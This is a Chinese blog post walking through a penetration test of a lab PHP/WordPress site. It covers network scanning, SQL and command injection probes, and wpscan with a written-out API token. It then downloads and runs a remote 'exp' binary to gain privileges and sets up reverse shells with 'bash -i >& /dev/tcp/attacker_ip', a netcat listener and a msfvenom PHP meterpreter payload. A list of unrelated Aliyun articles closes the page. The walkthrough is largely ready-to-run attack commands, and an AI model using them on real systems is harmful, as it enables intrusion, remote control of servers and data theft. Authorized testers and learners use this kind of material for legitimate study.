PHP站点渗投

简介: PHP站点渗投

image.png

image.png

cd\
cd .\Users
dir
cd yuanfh
cd .\Desktop\
ls
.\pc.psl

image.png

.\pc.psl
..\pc.psl
powercat

image.png

测试注入点是否存在通常是指在Web应用程序的安全测试中,检查是否有可能执行SQL注如、命令注入或其他类型的注入公鸡。这是一个敏感的操作,因为它涉及到可能违反法律和道德规范的行为。在进行此类测试之前,你必须确保你有权对目标系统进行安全测试,通常这意味着你需要得到系统所有者或管理员的明确许可。

发现地址

在Kali Linux中,有许多工具可以用来发现局域网内的IP地址。以下是几种常用的方法:

使用arp命令

arp命令可以显示本地计算机的ARP缓存表,其中包含了局域网内设备的IP地址和MAC地址。

sudo arp -a

1.

使用nmap工具

nmap是一个强大的网络扫描工具,可以用来发现局域网内的活跃主机。

sudo nmap -sn 192.168.1.0/24

1.

这里的192.168.1.0/24是你想要扫描的网络地址。这个命令会扫描该网段内的所有IP地址,并显示哪些地址有回应。

基本端口扫描

要扫描局域网内所有主机的开放端口,可以使用以下命令:

sudo nmap -p- 192.168.1.0/24

1.

这里,-p-参数表示扫描所有65535个TCP端口,192.168.1.0/24是要扫描的局域网网段。

指定端口范围扫描

如果你只想扫描特定的端口范围,可以使用以下命令:

sudo nmap -p 1-1024 192.168.1.0/24

1.

这里,-p 1-1024表示只扫描1到1024号端口。

快速扫描(SYN扫描)

如果你想进行更快速的扫描,可以使用SYN扫描(也称为半开放扫描):

sudo nmap -sS -p- 192.168.1.0/24

1.

这里,-sS参数表示使用SYN扫描。

使用ping命令

ping命令可以用来测试与某个IP地址的连通性。你可以遍历一个网段的所有IP地址来发现活跃的设备。

for ip in $(seq 1 254); do  

   ping -c 1 192.168.1.$ip &>/dev/null && echo "192.168.1.$ip is up"  

done

1.

2.

3.

这个脚本会依次ping局域网内的每个IP地址,并打印出有回应的地址。

使用fping工具

fping是一个快速的ping工具,可以同时ping多个IP地址。

sudo fping -a 192.168.1.0/24

1.

使用netdiscover工具

netdiscover是一个用于发现局域网内所有设备的工具。

sudo netdiscover -r 192.168.1.0/24

1.

使用avahi-browse工具

avahi-browse是一个用于浏览局域网内设备的服务发现工具。

sudo avahi-browse -a

1.

使用ipneigh命令

ipneigh命令可以显示本地网络接口的邻居缓存表。

sudo ip neigh show

1.

使用tcpdump工具

tcpdump是一个网络嗅探工具,可以用来捕获和分析网络流量。通过分析捕获的数据包,你可以发现局域网内的IP地址。

sudo tcpdump -i eth0 -nn host 192.168.1.0/24

1.

以下是一些常见的注入点测试方法:

SQL注如测试

单引号测试:尝试在输入框中输入单引号',如果应用程序返回错误或者异常,这可能表明存在SQL注如的风险。

基于错误的注入:尝试输入可能导致SQL语法错误的输入,比如1' OR '1'='1,如果应用程序返回了数据库的错误信息,这可能是一个注入点。

基于时间的注入:使用延时函数,如MySQL中的BENCHMARK()或SLEEP(),来测试应用程序的响应时间是否有异常变化。

基于联合查询的注入:尝试使用UNION SELECT语句来检索额外的数据,例如1 UNION SELECT version(), @@version--。

命令注入测试

分隔符测试:尝试在输入中加入操作系统命令分隔符,如Windows中的;或Linux中的&&或|,看是否能执行多个命令。

特殊字符测试:尝试输入特殊字符,如&、<、>、*等,这些字符在命令行中有特殊含义,可能导致意外的命令执行。

反引号测试:在一些编程语言中,如PHP,可以使用反引号`来执行系统命令,尝试输入包含反引号的输入,看是否能执行命令。

注意事项

合法性:未经授权的渗投测试是非法的,务必获得相应的授权。

道德性:即使获得了授权,也应遵循道德准则,避免对生产环境造成影响。

责任性:在发现漏动后,应负责任地向系统所有者报告,而不是滥用这些信息。

安全性:在进行测试时,确保自己的行为不会对系统的安全性和稳定性造成威胁。

如果你是在合法授权的情况下进行测试,可以使用专业的工具如SQLMap、Burp Suite等来自动化检测注入点。这些工具能够帮助你更有效地识别和验证潜在的注入漏动。记住,任何安全测试都应该在合法和道德的框架内进行。

image.png

image.png

发现可疑的路径点击进来查看,看看重要文件,发现备份下载下来。

经过查看是一个web的网站源码,就是下面这个文件夹gila的备份zip

image.png

使用wpscan扫描

wpscan  --url http://172.31.1.30/wp

wpscan 是一个用于审计 WordPress 网站安全的工具。它能够检测 WordPress 核心、插件、主题中的已知漏动,以及提供一些其他有用的信息。

如果你想要对 http://172.31.1.30/wp 进行扫描,可以使用以下命令:

wpscan --url http://172.31.1.30/wp


这个命令将会对指定的 URL 进行一个基本的扫描。默认情况下,wpscan 会检测 WordPress 核心、插件和主题的版本,并检查是否有已知的安全漏动。

附加选项

wpscan 提供了许多附加选项,可以根据需要进行配置。以下是一些常用的选项:

--enumerate: 枚举更多的信息,例如用户、插件、主题等。

--plugins: 只扫描插件。

--themes: 只扫描主题。

--vulns: 显示已知漏动。

--output-file <file>: 将扫描结果保存到文件。

例如,如果你想要枚举用户并显示已知漏动,可以使用以下命令:

wpscan --url http://172.31.1.30/wp --enumerate u --vulns

image.png

wpscan --api-token hDYOmjBiuxVlkLVk4wkSPHESisqIqmVUoM8rG0PmaY0 --url http://172.31.1.30/wp


当你使用 wpscan 进行 WordPress 安全扫描时,如果你有一个 WPScan API 密钥(API token),你可以将其添加到命令中以解锁额外的功能和更快的扫描速度。API 密钥通常用于支持 WPScan 项目,并通过捐赠获得(目前免费)。

以下是如何在你的命令中包含 API 密钥的示例:

wpscan --api-token hDYOmjBiuxVlkLVk4wkSPHESisqIqmVUoM8rG0PmaY0 --url http://172.31.1.30/wp


在这个命令中,hDYOmjBiuxVlkLVk4wkSPHESisqIqmVUoM8rG0PmaY0 是你的 API 密钥,http://172.31.1.30/wp 是你要扫描的 WordPress 站点的 URL。

附加选项

除了基本的扫描之外,你还可以添加其他选项来定制你的扫描。例如,如果你想要枚举用户并检查已知的漏动,你可以使用以下命令:

wpscan --api-token hDYOmjBiuxVlkLVk4wkSPHESisqIqmVUoM8rG0PmaY0 --url http://172.31.1.30/wp --enumerate u --vulnerabilities


在这个命令中,--enumerate u 表示枚举用户,而 --vulnerabilities 表示检查已知的漏动。

通用流程

扫端口-发现端口-发现web站点/应用-手动搜集信息-遍历目录-后台登陆页面及重要文件-根据扫描到的目录、版本信息查看有什么针对性的专用漏动扫描器-检查有没有扫描可以利用。

sql注如

发现诸如点-sqlmap跑数据库名和表名-爆破应用数据库及数据表-管理员/用户数据表把账户和密吗下载出来-做破接-利用密吗登录管理员后台-进一步渗投站点

image.png

image.png

cd /tmp
pwd
wget http://172.31.1.16/exp
chmod 777 exp
./exp

image.png

看回显发现也没有问题,成功了。执行了exp之后也获得了权限

以下是具体步骤:

在Kali机器上安装并配置Web服务器(以Apache为例):

sudo apt-get update
sudo apt-get install apache2


将反弹shell脚本上传到Apache的默认目录(通常是/var/www/html):

sudo cp /path/to/your/reverse_shell.php /var/www/html/


确保Apache服务正在运行:

sudo systemctl start apache2
sudo systemctl enable apache2


在Web端,使用wget命令下载反弹shell脚本。首先,找到你的Kali机器的IP地址,然后在Web端执行以下命令(将your_kali_ip替换为实际的IP地址):

wget http://your_kali_ip/reverse_shell.php


下载完成后,你可以使用PHP或其他支持的语言来执行反弹shell脚本。例如,如果你使用的是PHP,可以在Web端执行以下命令:

php reverse_shell.php


或者

要在Web端利用wget下载Kali机器上的反弹shell,你需要遵循以下步骤:

首先,在Kali机器上创建一个反弹shell脚本。这里我们使用bash shell作为示例:

#!/bin/bash
bash -i >& /dev/tcp/your_attacker_ip/your_attacker_port 0>&1


将上述代码中的your_attacker_ip和your_attacker_port替换为你的公鸡者IP地址和端口号。

保存脚本到一个文件,例如reverse_shell.sh,并确保它具有可执行权限:

chmod +x reverse_shell.sh


在Kali机器上启动一个监听器,以便接收反弹的shell连接。你可以使用netcat或nc工具来实现这一点:

nc -lvp your_attacker_port


将your_attacker_port替换为你在第1步中设置的端口号。

在Web端,使用wget命令下载反弹shell脚本。假设你已经知道Kali机器上的URL路径(例如:http://kali_machine_ip/reverse_shell.sh),则可以使用以下命令:

wget http://kali_machine_ip/reverse_shell.sh


下载完成后,你可以在Web端的机器上运行下载的反弹shell脚本,以连接到Kali机器:

./reverse_shell.sh


现在,你应该已经成功建立了从Web端到Kali机器的反弹shell连接。请注意,这种方法仅适用于你有权限访问Kali机器上的反弹shell脚本的情况。此外,出于安全原因,不建议在生产环境中使用此类技术。

exp编写

在Kali Linux上,你可以使用Metasploit框架来创建一个针对特定网站的漏动利用(exploit)脚本。以下是一个简单的示例,用于创建一个基于PHP的Web应用程序漏动的Metasploit模块:

首先,确保你已经安装了Metasploit框架。如果没有,请运行以下命令安装:

sudo apt-get update
sudo apt-get install metasploit-framework


创建一个新的Metasploit模块。打开终端并输入以下命令:

msfvenom -p php/meterpreter_reverse_tcp LHOST=your_kali_ip LPORT=your_kali_port -f raw > shell.php


将your_kali_ip替换为你的Kali Linux机器的IP地址,将your_kali_port替换为你希望监听的端口号。这将生成一个名为shell.php的文件,其中包含一个反向TCP Meterpreter shell。

将生成的shell.php文件上传到目标网站的服务器上。你可以使用FTP客户端、SCP或其他方法将文件传输到目标服务器。

在Kali Linux上,启动Metasploit控制台并设置监听器:

msfconsole

在Metasploit控制台中,输入以下命令以设置监听器:

use exploit/multi/handler
set PAYLOAD php/meterpreter_reverse_tcp
set LHOST your_kali_ip
set LPORT your_kali_port
exploit


现在,当目标用户访问上传了shell.php文件的网站时,他们将被连接到你的Kali Linux机器上的Metasploit监听器。你可以在Metasploit控制台中执行各种命令来控制目标系统。

请注意,这只是一个简单的示例,实际的公鸡可能需要更复杂的漏动利用和公鸡策略。在进行任何形式的渗投测试或公鸡之前,请确保你拥有合法的授权和权限。


相关文章
|
24天前
|
弹性计算 人工智能 架构师
阿里云携手Altair共拓云上工业仿真新机遇
2024年9月12日,「2024 Altair 技术大会杭州站」成功召开,阿里云弹性计算产品运营与生态负责人何川,与Altair中国技术总监赵阳在会上联合发布了最新的“云上CAE一体机”。
阿里云携手Altair共拓云上工业仿真新机遇
|
16天前
|
存储 关系型数据库 分布式数据库
GraphRAG:基于PolarDB+通义千问+LangChain的知识图谱+大模型最佳实践
本文介绍了如何使用PolarDB、通义千问和LangChain搭建GraphRAG系统,结合知识图谱和向量检索提升问答质量。通过实例展示了单独使用向量检索和图检索的局限性,并通过图+向量联合搜索增强了问答准确性。PolarDB支持AGE图引擎和pgvector插件,实现图数据和向量数据的统一存储与检索,提升了RAG系统的性能和效果。
|
20天前
|
机器学习/深度学习 算法 大数据
【BetterBench博士】2024 “华为杯”第二十一届中国研究生数学建模竞赛 选题分析
2024“华为杯”数学建模竞赛,对ABCDEF每个题进行详细的分析,涵盖风电场功率优化、WLAN网络吞吐量、磁性元件损耗建模、地理环境问题、高速公路应急车道启用和X射线脉冲星建模等多领域问题,解析了问题类型、专业和技能的需要。
2577 22
【BetterBench博士】2024 “华为杯”第二十一届中国研究生数学建模竞赛 选题分析
|
18天前
|
人工智能 IDE 程序员
期盼已久!通义灵码 AI 程序员开启邀测,全流程开发仅用几分钟
在云栖大会上,阿里云云原生应用平台负责人丁宇宣布,「通义灵码」完成全面升级,并正式发布 AI 程序员。
|
3天前
|
JSON 自然语言处理 数据管理
阿里云百炼产品月刊【2024年9月】
阿里云百炼产品月刊【2024年9月】,涵盖本月产品和功能发布、活动,应用实践等内容,帮助您快速了解阿里云百炼产品的最新动态。
阿里云百炼产品月刊【2024年9月】
|
2天前
|
存储 人工智能 搜索推荐
数据治理,是时候打破刻板印象了
瓴羊智能数据建设与治理产品Datapin全面升级,可演进扩展的数据架构体系为企业数据治理预留发展空间,推出敏捷版用以解决企业数据量不大但需构建数据的场景问题,基于大模型打造的DataAgent更是为企业用好数据资产提供了便利。
164 2
|
20天前
|
机器学习/深度学习 算法 数据可视化
【BetterBench博士】2024年中国研究生数学建模竞赛 C题:数据驱动下磁性元件的磁芯损耗建模 问题分析、数学模型、python 代码
2024年中国研究生数学建模竞赛C题聚焦磁性元件磁芯损耗建模。题目背景介绍了电能变换技术的发展与应用,强调磁性元件在功率变换器中的重要性。磁芯损耗受多种因素影响,现有模型难以精确预测。题目要求通过数据分析建立高精度磁芯损耗模型。具体任务包括励磁波形分类、修正斯坦麦茨方程、分析影响因素、构建预测模型及优化设计条件。涉及数据预处理、特征提取、机器学习及优化算法等技术。适合电气、材料、计算机等多个专业学生参与。
1576 16
【BetterBench博士】2024年中国研究生数学建模竞赛 C题:数据驱动下磁性元件的磁芯损耗建模 问题分析、数学模型、python 代码
|
22天前
|
编解码 JSON 自然语言处理
通义千问重磅开源Qwen2.5,性能超越Llama
击败Meta,阿里Qwen2.5再登全球开源大模型王座
978 14
|
4天前
|
Linux 虚拟化 开发者
一键将CentOs的yum源更换为国内阿里yum源
一键将CentOs的yum源更换为国内阿里yum源
221 2
|
17天前
|
人工智能 开发框架 Java
重磅发布!AI 驱动的 Java 开发框架:Spring AI Alibaba
随着生成式 AI 的快速发展,基于 AI 开发框架构建 AI 应用的诉求迅速增长,涌现出了包括 LangChain、LlamaIndex 等开发框架,但大部分框架只提供了 Python 语言的实现。但这些开发框架对于国内习惯了 Spring 开发范式的 Java 开发者而言,并非十分友好和丝滑。因此,我们基于 Spring AI 发布并快速演进 Spring AI Alibaba,通过提供一种方便的 API 抽象,帮助 Java 开发者简化 AI 应用的开发。同时,提供了完整的开源配套,包括可观测、网关、消息队列、配置中心等。
735 9